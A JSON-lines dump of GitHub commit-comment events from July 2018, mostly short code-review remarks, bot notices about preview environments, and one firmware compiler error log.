{"id":"7992122057","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29771997,"position":null,"line":null,"path":null,"commit_id":"44ecc3507f2cfa84b7e152e14eea1bba321fdaa0","created_at":"2018-07-19T23:21:43Z","updated_at":"2018-07-19T23:21:43Z","author_association":"OWNER","body":"And with commit 4daff40, I've re-introduced the mapping, but with no struct this time."}},"created_at":"2018-07-19T23:21:43Z"}
{"id":"7992123527","type":"CommitCommentEvent","actor":{"login":"bcdj"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29772002,"position":60,"line":60,"path":"mlvision/MLVisionExampleObjc/CameraViewController.m","commit_id":"d49e3012345297cbd589d388c2e703c306ec800e","created_at":"2018-07-19T23:22:14Z","updated_at":"2018-07-19T23:22:14Z","author_association":"NONE","body":"nit: replace all \"_xyz\" ivar accessors with the \"self.xyz\" property accessors?  here and everywhere below in this file"}},"created_at":"2018-07-19T23:22:14Z"}
{"id":"7992126930","type":"CommitCommentEvent","actor":{"login":"SpicyAlfredo"},"repo":{"name":"deliciousmods/1956_beta"},"payload":{"comment":{"id":29772008,"position":null,"line":null,"path":null,"commit_id":"85c940764ab681776eb63c3f76c16744f7583de3","created_at":"2018-07-19T23:23:28Z","updated_at":"2018-07-19T23:23:28Z","author_association":"CONTRIBUTOR","body":"Decrease the cost of the focus to 10 to compensate\r\n "}},"created_at":"2018-07-19T23:23:28Z"}
{"id":"7992128108","type":"CommitCommentEvent","actor":{"login":"bcdj"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29772012,"position":125,"line":125,"path":"mlvision/MLVisionExampleObjc/CameraViewController.m","commit_id":"d49e3012345297cbd589d388c2e703c306ec800e","created_at":"2018-07-19T23:23:54Z","updated_at":"2018-07-19T23:23:54Z","author_association":"NONE","body":"similarly, can remove !texts since texts.count == 0 does both nil and count check."}},"created_at":"2018-07-19T23:23:54Z"}
{"id":"7992134543","type":"CommitCommentEvent","actor":{"login":"bcdj"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29772033,"position":160,"line":160,"path":"mlvision/MLVisionExampleObjc/CameraViewController.m","commit_id":"d49e3012345297cbd589d388c2e703c306ec800e","created_at":"2018-07-19T23:26:10Z","updated_at":"2018-07-19T23:26:10Z","author_association":"NONE","body":"Please try this out before making this change - to make sure the speed/latency is OK in live camera feed.  Make sure to compile the app in the release/optimized mode.  The default debug mode will be way too slow for live camera feed."}},"created_at":"2018-07-19T23:26:10Z"}
{"id":"7992144721","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29772060,"position":null,"line":null,"path":null,"commit_id":"8b493a84d050cfd5eaf420a9a3d6c34b443e0fe1","created_at":"2018-07-19T23:29:47Z","updated_at":"2018-07-19T23:29:47Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-153](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-153).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-153-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-19T23:29:47Z"}
{"id":"7992146877","type":"CommitCommentEvent","actor":{"login":"froggz19"},"repo":{"name":"DatBrick/OpenMM2"},"payload":{"comment":{"id":29772066,"position":null,"line":null,"path":null,"commit_id":"ed3dc1511bf05ae24d9e507e36ec7738e15aa502","created_at":"2018-07-19T23:30:29Z","updated_at":"2018-07-19T23:30:29Z","author_association":"NONE","body":"I know this isn't the right place to get into a conversation, so... is there another way to get into contact with you? I'm using an old GTA5 menu base of yours (BricksMenu) and I was trying to change the way the menu scrolling works but I suck at math so I thought you might help me since you created that base. I used to be a founder on inf***us discord... That was the only place where I could find you but the server is no longer available.\r\n\r\nBy default, the scrolling starts from middle and this is what I'm trying to achieve\r\nhttps://user-images.githubusercontent.com/8935954/42974691-926640c0-8bb8-11e8-8a9a-c69c337c4e88.png\r\n\r\nI guess these are the lines which must be changed... F MATH :(\r\n\r\n```\r\nstatic float MenuY = 0.0625f;\r\nstatic float RowHeight = 0.0325f;\r\nstatic float TitleHeight = RowHeight * 2.5f;\r\nstatic float MaxHeight = 1.0f - TitleHeight - MenuY * 2.0f;\r\nstatic int MaxRows = int(round(1 / RowHeight * MaxHeight) - 1);\r\nstatic int Middle = int(floor(MaxRows * 0.5f - 0.5f));\r\n\r\nint currSize = int(currMenu.rows.size()); // Current Menu Size\r\nint end = min(currSize, max(0, currentSelectionIndex - Middle) + MaxRows);\r\nint start = max(0, end - MaxRows);\r\nint length = end - start;\r\n```\r\n\r\nAny help will be appreciated."}},"created_at":"2018-07-19T23:30:29Z"}
{"id":"7992151586","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"NikKosmo/spring_02"},"payload":{"comment":{"id":29772084,"position":16,"line":15,"path":"src/main/java/configuration/TestSourceConfiguration.java","commit_id":"2318a7b7a18913a70326dba101bd9656b34d3fff","created_at":"2018-07-19T23:32:04Z","updated_at":"2018-07-19T23:32:04Z","author_association":"NONE","body":"Это можно записать в параметр метода ниже."}},"created_at":"2018-07-19T23:32:04Z"}
{"id":"7992152266","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"NikKosmo/spring_02"},"payload":{"comment":{"id":29772086,"position":3,"line":1,"path":"src/main/resources/application.properties","commit_id":"2318a7b7a18913a70326dba101bd9656b34d3fff","created_at":"2018-07-19T23:32:20Z","updated_at":"2018-07-19T23:32:20Z","author_association":"NONE","body":"Всё так)"}},"created_at":"2018-07-19T23:32:20Z"}
{"id":"7992156665","type":"CommitCommentEvent","actor":{"login":"soulseekah"},"repo":{"name":"gravityview/GravityView"},"payload":{"comment":{"id":29772106,"position":5,"line":44,"path":"future/includes/rest/class-gv-rest-route.php","commit_id":"98e65629d01e2b39bd5d64b8b56b4abb3c82e07d","created_at":"2018-07-19T23:33:49Z","updated_at":"2018-07-19T23:33:49Z","author_association":"MEMBER","body":"Did I miss something? :open_mouth: "}},"created_at":"2018-07-19T23:33:49Z"}
{"id":"7992157417","type":"CommitCommentEvent","actor":{"login":"JustinBKinser"},"repo":{"name":"JustinBKinser/FrontEnd-5-18"},"payload":{"comment":{"id":29772110,"position":null,"line":null,"path":null,"commit_id":"d54ebc3f0ed903f12b48d5a3913205c8731dc5c2","created_at":"2018-07-19T23:34:07Z","updated_at":"2018-07-19T23:34:07Z","author_association":"OWNER","body":"Removed \"Projects\" page, added embedded content from external sites, formatted html form. "}},"created_at":"2018-07-19T23:34:07Z"}
{"id":"7992158827","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29772115,"position":22,"line":46,"path":"contracts/Splitter.sol","commit_id":"4daff402bed1baef35e4459119af60f9dd3c299d","created_at":"2018-07-19T23:34:37Z","updated_at":"2018-07-19T23:34:37Z","author_association":"NONE","body":"Sequential events like this are often a hint that things are straying off track style-wise. You should be able to create a 1:1 correspondence between the functions and their inputs and the events they emit. See the hint about when/where to pass the recipient args into the contract for a hint that will actually naturally sort this out. "}},"created_at":"2018-07-19T23:34:37Z"}
{"id":"7992161216","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"NikKosmo/spring_02"},"payload":{"comment":{"id":29772126,"position":16,"line":16,"path":"src/main/java/tester/TestingServiceImpl.java","commit_id":"71568361343cb72635a693cdb2c132db9f6b010a","created_at":"2018-07-19T23:35:31Z","updated_at":"2018-07-19T23:35:31Z","author_association":"NONE","body":"final"}},"created_at":"2018-07-19T23:35:31Z"}
{"id":"7992162489","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29772141,"position":null,"line":null,"path":null,"commit_id":"da1501330c9f6072dea684dd4717e6b3af8fba27","created_at":"2018-07-19T23:35:57Z","updated_at":"2018-07-19T23:35:57Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-156](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-156).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-156-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-19T23:35:57Z"}
{"id":"7992164892","type":"CommitCommentEvent","actor":{"login":"0Lucifer0"},"repo":{"name":"NosCoreIO/NosCore"},"payload":{"comment":{"id":29772147,"position":33,"line":415,"path":"src/NosCore.Controllers/DefaultPacketController.cs","commit_id":"54ec101d1076c236cb4f8dd2e706fa3586109700","created_at":"2018-07-19T23:36:45Z","updated_at":"2018-07-19T23:36:45Z","author_association":"COLLABORATOR","body":"Use it in a property and override the get "}},"created_at":"2018-07-19T23:36:45Z"}
{"id":"7992169140","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29772155,"position":null,"line":null,"path":null,"commit_id":"2e448228930b1347ac34f92beab224a4c78cd690","created_at":"2018-07-19T23:38:10Z","updated_at":"2018-07-19T23:38:10Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-828](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-828).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-828-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-19T23:38:10Z"}
{"id":"7992169938","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29772157,"position":14,"line":39,"path":"contracts/Splitter.sol","commit_id":"4daff402bed1baef35e4459119af60f9dd3c299d","created_at":"2018-07-19T23:38:28Z","updated_at":"2018-07-19T23:38:28Z","author_association":"NONE","body":"I think we're ready to push into the stretch goals. There is extra busyness in various places but it's tied to this rather awkward simplistic idea of using the contract just once. This has you treating alice, bob and carol as if there are three special addresses to be concerned with. \r\n\r\nInstead of configuring these participants in the constructor, when would happen if you had users pass the receivers in with every transaction?\r\n\r\nSomething like:\r\n\r\n`function splitFunds(address receiver1, address receiver2) public payable returns(bool success) { ...`\r\n"}},"created_at":"2018-07-19T23:38:28Z"}
{"id":"7992170942","type":"CommitCommentEvent","actor":{"login":"Nalinc"},"repo":{"name":"Nalinc/turkserver-meteor"},"payload":{"comment":{"id":29772162,"position":null,"line":null,"path":null,"commit_id":"066c9737481174c1a4fc7b1cbfe8432dcd158e38","created_at":"2018-07-19T23:38:51Z","updated_at":"2018-07-19T23:38:51Z","author_association":"OWNER","body":"@mizzao Thanks for noticing this. I [opened a PR](https://github.com/TurkServer/turkserver-meteor/pull/95) to fix TurkServer/turkserver-meteor#28. Changes are based on the discussions we had under that issue's thread."}},"created_at":"2018-07-19T23:38:51Z"}
{"id":"7992171453","type":"CommitCommentEvent","actor":{"login":"0Lucifer0"},"repo":{"name":"NosCoreIO/NosCore"},"payload":{"comment":{"id":29772165,"position":5,"line":22,"path":"src/NosCore.Database/NosCore.Database.csproj","commit_id":"54ec101d1076c236cb4f8dd2e706fa3586109700","created_at":"2018-07-19T23:39:02Z","updated_at":"2018-07-19T23:39:02Z","author_association":"COLLABORATOR","body":"Why ?"}},"created_at":"2018-07-19T23:39:02Z"}
{"id":"7992173687","type":"CommitCommentEvent","actor":{"login":"Elendan"},"repo":{"name":"NosCoreIO/NosCore"},"payload":{"comment":{"id":29772170,"position":5,"line":22,"path":"src/NosCore.Database/NosCore.Database.csproj","commit_id":"54ec101d1076c236cb4f8dd2e706fa3586109700","created_at":"2018-07-19T23:39:55Z","updated_at":"2018-07-19T23:39:55Z","author_association":"COLLABORATOR","body":"Ups, sorry, will remove that asap, I thought I deleted it \r\n"}},"created_at":"2018-07-19T23:39:55Z"}
{"id":"7992173869","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29772171,"position":null,"line":null,"path":null,"commit_id":"eb2ac4e13d57642d485394057f573bdb946391eb","created_at":"2018-07-19T23:40:00Z","updated_at":"2018-07-19T23:40:00Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das views](https://trello.com/c/2vCXtjkh/219-refatora%C3%A7%C3%A3o-das-views)"}},"created_at":"2018-07-19T23:40:00Z"}
{"id":"7992173878","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29772172,"position":null,"line":null,"path":null,"commit_id":"eb2ac4e13d57642d485394057f573bdb946391eb","created_at":"2018-07-19T23:40:00Z","updated_at":"2018-07-19T23:40:00Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das views](https://trello.com/c/2vCXtjkh/219-refatora%C3%A7%C3%A3o-das-views)"}},"created_at":"2018-07-19T23:40:00Z"}
{"id":"7992174157","type":"CommitCommentEvent","actor":{"login":"0Lucifer0"},"repo":{"name":"NosCoreIO/NosCore"},"payload":{"comment":{"id":29772173,"position":17,"line":23,"path":"src/NosCore.GameObject/Character.cs","commit_id":"54ec101d1076c236cb4f8dd2e706fa3586109700","created_at":"2018-07-19T23:40:07Z","updated_at":"2018-07-19T23:40:07Z","author_association":"COLLABORATOR","body":"Use a threadsafe list "}},"created_at":"2018-07-19T23:40:07Z"}
{"id":"7992175721","type":"CommitCommentEvent","actor":{"login":"prasadkasturi"},"repo":{"name":"navitastech-rfad/rfad-ui"},"payload":{"comment":{"id":29772180,"position":null,"line":null,"path":null,"commit_id":"d40ab689e52b9ab52e749ec0f0deb7da54b0d483","created_at":"2018-07-19T23:40:44Z","updated_at":"2018-07-19T23:40:44Z","author_association":"NONE","body":"Test"}},"created_at":"2018-07-19T23:40:44Z"}
{"id":"7992176554","type":"CommitCommentEvent","actor":{"login":"0Lucifer0"},"repo":{"name":"NosCoreIO/NosCore"},"payload":{"comment":{"id":29772183,"position":33,"line":39,"path":"src/NosCore.GameObject/Character.cs","commit_id":"54ec101d1076c236cb4f8dd2e706fa3586109700","created_at":"2018-07-19T23:41:05Z","updated_at":"2018-07-19T23:41:05Z","author_association":"COLLABORATOR","body":"Use ? And ?? To simply"}},"created_at":"2018-07-19T23:41:05Z"}
{"id":"7992176816","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"NikKosmo/spring_02"},"payload":{"comment":{"id":29772185,"position":73,"line":97,"path":"src/main/java/tester/TestingServiceImpl.java","commit_id":"51bcd6d3423fc4695753464b648cb454e5fb1239","created_at":"2018-07-19T23:41:11Z","updated_at":"2018-07-19T23:41:11Z","author_association":"NONE","body":"А почему здесь зафиксирована локаль? МОжно положить её в контекст и зафиксировать там, или прочитать из параметров. Но не здесь.\r\n"}},"created_at":"2018-07-19T23:41:11Z"}
{"id":"7992178160","type":"CommitCommentEvent","actor":{"login":"0Lucifer0"},"repo":{"name":"NosCoreIO/NosCore"},"payload":{"comment":{"id":29772190,"position":9,"line":9,"path":"src/NosCore.Shared/Enumerations/FinsPacketType.cs","commit_id":"54ec101d1076c236cb4f8dd2e706fa3586109700","created_at":"2018-07-19T23:41:44Z","updated_at":"2018-07-19T23:41:44Z","author_association":"COLLABORATOR","body":"Every Enum need a number don’t let it be automatic "}},"created_at":"2018-07-19T23:41:44Z"}
{"id":"7992180613","type":"CommitCommentEvent","actor":{"login":"0Lucifer0"},"repo":{"name":"NosCoreIO/NosCore"},"payload":{"comment":{"id":29772202,"position":39,"line":45,"path":"src/NosCore.GameObject/Character.cs","commit_id":"54ec101d1076c236cb4f8dd2e706fa3586109700","created_at":"2018-07-19T23:42:40Z","updated_at":"2018-07-19T23:42:40Z","author_association":"COLLABORATOR","body":"Need to be threadsafe"}},"created_at":"2018-07-19T23:42:40Z"}
{"id":"7992181333","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29772203,"position":null,"line":null,"path":null,"commit_id":"78458c822c0fda0c272e2a3915d19df90dceb479","created_at":"2018-07-19T23:42:57Z","updated_at":"2018-07-19T23:42:57Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-229](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-229).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-229-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-19T23:42:57Z"}
{"id":"7992185581","type":"CommitCommentEvent","actor":{"login":"cdl08001"},"repo":{"name":"hrsf99-Expressel/expressel-sidebar-service"},"payload":{"comment":{"id":29772216,"position":1,"line":1,"path":"db/seedData.csv","commit_id":"2085943f174978726d9f6bd79aa17549de5f31e0","created_at":"2018-07-19T23:44:31Z","updated_at":"2018-07-19T23:44:31Z","author_association":"NONE","body":"Watch out for the '+' symbols - this might cause issues if you load into the db?"}},"created_at":"2018-07-19T23:44:31Z"}
{"id":"7992192023","type":"CommitCommentEvent","actor":{"login":"isonil"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29772244,"position":null,"line":null,"path":null,"commit_id":"27dfafea700375669fd9e3e22af1e96bdd0b1b1b","created_at":"2018-07-19T23:46:52Z","updated_at":"2018-07-19T23:46:52Z","author_association":"CONTRIBUTOR","body":"Note that the translation tool simply moved these translations to RulePacks_Namers_Factions.xml (they weren't removed), so now there are duplicates, e.g. NamerFactionPirate is defined twice."}},"created_at":"2018-07-19T23:46:52Z"}
{"id":"7992193203","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29772247,"position":null,"line":null,"path":null,"commit_id":"1e354a75c8268d4533300d2619c32a74e5a77300","created_at":"2018-07-19T23:47:18Z","updated_at":"2018-07-19T23:47:18Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-831](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-831).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-831-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-19T23:47:18Z"}
{"id":"7992193638","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"bocoup/wpt"},"payload":{"comment":{"id":29772250,"position":null,"line":null,"path":null,"commit_id":"dac0315ec596e1931f2cab8d1f56375913978193","created_at":"2018-07-19T23:47:27Z","updated_at":"2018-07-19T23:47:27Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nUnexpected token error\n\n</details>"}},"created_at":"2018-07-19T23:47:27Z"}
{"id":"7992204150","type":"CommitCommentEvent","actor":{"login":"0Lucifer0"},"repo":{"name":"NosCoreIO/NosCore"},"payload":{"comment":{"id":29772264,"position":60,"line":134,"path":"src/NosCore.GameObject/Networking/ServerManager.cs","commit_id":"54ec101d1076c236cb4f8dd2e706fa3586109700","created_at":"2018-07-19T23:51:23Z","updated_at":"2018-07-19T23:51:23Z","author_association":"COLLABORATOR","body":"No need lock if threadsafe"}},"created_at":"2018-07-19T23:51:23Z"}
{"id":"7992205283","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29772267,"position":null,"line":null,"path":null,"commit_id":"e51b6f1f60626932e526676133c350e134534549","created_at":"2018-07-19T23:51:50Z","updated_at":"2018-07-19T23:51:50Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-832](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-832).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-832-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-19T23:51:50Z"}
{"id":"7992209192","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29772278,"position":null,"line":null,"path":null,"commit_id":"75d94af4a1fc6941f5c936bffffb50c0613f6c12","created_at":"2018-07-19T23:53:26Z","updated_at":"2018-07-19T23:53:26Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-59](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-59).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-59-tre.pantheonsite.io/)"}},"created_at":"2018-07-19T23:53:26Z"}
{"id":"7992214163","type":"CommitCommentEvent","actor":{"login":"Royalgamer06"},"repo":{"name":"DoctorMcKay/node-steamcommunity"},"payload":{"comment":{"id":29772289,"position":null,"line":null,"path":null,"commit_id":"adbf1d47a77d52a0f3854e557b5a3d0c90f8762a","created_at":"2018-07-19T23:55:24Z","updated_at":"2018-07-19T23:55:24Z","author_association":"NONE","body":"Check https://github.com/DoctorMcKay/node-steamcommunity/issues/200"}},"created_at":"2018-07-19T23:55:24Z"}
{"id":"7992222211","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"efserg/otus-spring"},"payload":{"comment":{"id":29772306,"position":6,"line":62,"path":".gitignore","commit_id":"37a69e1d41d85bf908b0097b42f637112cf419f3","created_at":"2018-07-19T23:58:27Z","updated_at":"2018-07-19T23:58:27Z","author_association":"NONE","body":"target/ тогда уж)"}},"created_at":"2018-07-19T23:58:27Z"}
{"id":"7992226216","type":"CommitCommentEvent","actor":{"login":"Ccleorina87"},"repo":{"name":"MarlinFirmware/Marlin"},"payload":{"comment":{"id":29772314,"position":null,"line":null,"path":null,"commit_id":"9660996cc3c926aab12f851346466c4c516b9a31","created_at":"2018-07-19T23:59:52Z","updated_at":"2018-07-19T23:59:52Z","author_association":"NONE","body":"Compiling .pioenvs\\megaatmega2560\\src\\src\\feature\\bedlevel\\bedlevel.cpp.o\r\nIn file included from Marlin\\src\\feature\\Max7219_Debug_LEDs.cpp:44:0:\r\nMarlin\\src\\feature\\Max7219_Debug_LEDs.cpp: In function 'void Max7219_LED_Set(uint8_t, uint8_t, bool)':\r\nMarlin\\src\\feature\\Max7219_Debug_LEDs.h:136:53: error: expected ')' before\r\n']' token\r\n#define XOR_7219(x, y)          LEDs[x + (y & 0xF8] ^= _BV(7 - (y & 0x7))\r\n^\r\nMarlin\\src\\feature\\Max7219_Debug_LEDs.cpp:175:3: note: in expansion of macro 'XOR_7219'\r\nXOR_7219(x, y);\r\n^\r\nMarlin\\src\\feature\\Max7219_Debug_LEDs.cpp:175:17: error: expected ']' before ';' token\r\nXOR_7219(x, y);\r\n^\r\nMarlin\\src\\feature\\Max7219_Debug_LEDs.cpp:175:17: warning: statement has no effect [-Wunused-value]\r\nIn file included from Marlin\\src\\feature\\Max7219_Debug_LEDs.cpp:44:0:\r\nMarlin\\src\\feature\\Max7219_Debug_LEDs.cpp: In function 'void Max7219_Set_Row(uint8_t, uint32_t)':\r\nMarlin\\src\\feature\\Max7219_Debug_LEDs.h:137:53: error: expected ')' before\r\n']' token\r\n#define SET_PIXEL_7219(x, y)    LEDs[x + (y & 0xF8] |= _BV(7 - (y & 0x7))\r\n^\r\nMarlin\\src\\feature\\Max7219_Debug_LEDs.cpp:210:7: note: in expansion of macro 'SET_PIXEL_7219'\r\nSET_PIXEL_7219((MAX7219_X_LEDS-1-x), row);\r\n^\r\nMarlin\\src\\feature\\Max7219_Debug_LEDs.cpp:210:48: error: expected ']' before ';' token\r\nSET_PIXEL_7219((MAX7219_X_LEDS-1-x), row);\r\n^\r\nMarlin\\src\\feature\\Max7219_Debug_LEDs.cpp:210:48: warning: statement has no effect [-Wunused-value]\r\nIn file included from Marlin\\src\\feature\\Max7219_Debug_LEDs.cpp:44:0:\r\nMarlin\\src\\feature\\Max7219_Debug_LEDs.h:138:53: error: expected ')' before\r\n']' token\r\n#define CLEAR_PIXEL_7219(x, y)  LEDs[x + (y & 0xF8] &= (_BV(7 - (y & 0x7))\r\n^ 0xFF)\r\n^\r\nMarlin\\src\\feature\\Max7219_Debug_LEDs.cpp:212:7: note: in expansion of macro 'CLEAR_PIXEL_7219'\r\nCLEAR_PIXEL_7219((MAX7219_X_LEDS-1-x), row);\r\n^\r\ncompilation terminated due to -fmax-errors=5.\r\n*** [.pioenvs\\megaatmega2560\\src\\src\\feature\\Max7219_Debug_LEDs.cpp.o] Error 1"}},"created_at":"2018-07-19T23:59:52Z"}
{"id":"7986583679","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29758667,"position":null,"line":null,"path":null,"commit_id":"e615e9ae3f16a5252ef54ac9e79f633bdbd822d9","created_at":"2018-07-19T03:02:17Z","updated_at":"2018-07-19T03:02:17Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-427](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-427).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-427-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-19T03:02:17Z"}
{"id":"7986585247","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29758671,"position":null,"line":null,"path":null,"commit_id":"e615e9ae3f16a5252ef54ac9e79f633bdbd822d9","created_at":"2018-07-19T03:02:53Z","updated_at":"2018-07-19T03:02:53Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-428](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-428).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-428-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-19T03:02:53Z"}
{"id":"7986597383","type":"CommitCommentEvent","actor":{"login":"HolpStart"},"repo":{"name":"FastStonewkx/SpringMVC"},"payload":{"comment":{"id":29758690,"position":null,"line":null,"path":null,"commit_id":"44dbf2a25161f853d6283f52a60a296d497486ac","created_at":"2018-07-19T03:07:37Z","updated_at":"2018-07-19T03:07:37Z","author_association":"NONE","body":"god"}},"created_at":"2018-07-19T03:07:37Z"}
{"id":"7986600874","type":"CommitCommentEvent","actor":{"login":"aribrill"},"repo":{"name":"ctlearn-project/ctlearn"},"payload":{"comment":{"id":29758694,"position":null,"line":null,"path":null,"commit_id":"4e46949e075747d045bd07ca5fe603d15d62a564","created_at":"2018-07-19T03:09:01Z","updated_at":"2018-07-19T03:09:01Z","author_association":"COLLABORATOR","body":"It makes sense to me to have an option like apply_processing as a way to turn processing OFF, because it's a common thing to want an easy way to turn processing off for debugging or to figure out how much of your performance is due to changes in data processing vs. the network. So I certainly agree with that reason to have the flag and I'll add a comment in the example config to that effect.\r\n\r\nIt doesn't make sense to me to have apply_processing as a way to turn processing ON. It's intuitive that setting a data processing configuration option would turn it on and confusing that it wouldn't. It's annoying to have to separately change a second setting at best and could lead to unexpected or misunderstood results at worst.\r\n\r\nTherefore I think the natural default is to set apply_processing=true (and all specific processing options false)."}},"created_at":"2018-07-19T03:09:01Z"}
{"id":"7986601038","type":"CommitCommentEvent","actor":{"login":"jorgepasato87"},"repo":{"name":"jorgepasato87/proyecto-1-aprendiendo"},"payload":{"comment":{"id":29758695,"position":null,"line":null,"path":null,"commit_id":"56456fe28d819d30e1745477c2cdd4b844e5c80d","created_at":"2018-07-19T03:09:06Z","updated_at":"2018-07-19T03:09:06Z","author_association":"OWNER","body":"bueno tenemos primero que estar mas despiertos para poder mejorar en la concentracion y asi no fallar"}},"created_at":"2018-07-19T03:09:06Z"}
{"id":"7986608577","type":"CommitCommentEvent","actor":{"login":"linlycode"},"repo":{"name":"linlycode/olcode"},"payload":{"comment":{"id":29758703,"position":9,"line":9,"path":"pkg/apiservice/handler.go","commit_id":"95f860fb02425bf8d81bb6b0265816e1bd8b2406","created_at":"2018-07-19T03:12:08Z","updated_at":"2018-07-19T03:12:08Z","author_association":"OWNER","body":"Why make it an interface?"}},"created_at":"2018-07-19T03:12:08Z"}
{"id":"7986610711","type":"CommitCommentEvent","actor":{"login":"sukima"},"repo":{"name":"ruanyl/vim-sort-imports"},"payload":{"comment":{"id":29758706,"position":17,"line":27,"path":"autoload/import_sort.vim","commit_id":"f31a7addec226c67c3d75bb6fd33f7501c6362c6","created_at":"2018-07-19T03:13:01Z","updated_at":"2018-07-19T03:13:01Z","author_association":"NONE","body":"I can not belive that import-sort is so borked as to not allow stdin/stdout like sane programs. Vim's filter was designed for this very purpose! (`:help :range!`)"}},"created_at":"2018-07-19T03:13:01Z"}
{"id":"7986613766","type":"CommitCommentEvent","actor":{"login":"jogo-"},"repo":{"name":"jrsoftware/issrc"},"payload":{"comment":{"id":29758712,"position":27,"line":8705,"path":"Projects/Compile.pas","commit_id":"3f52db8a5004d7222277430c3b942eb03004aa7a","created_at":"2018-07-19T03:14:12Z","updated_at":"2018-07-19T03:14:12Z","author_association":"CONTRIBUTOR","body":"Typo on 'ChangesEnviroment'->'ChangesEnvironment'"}},"created_at":"2018-07-19T03:14:12Z"}
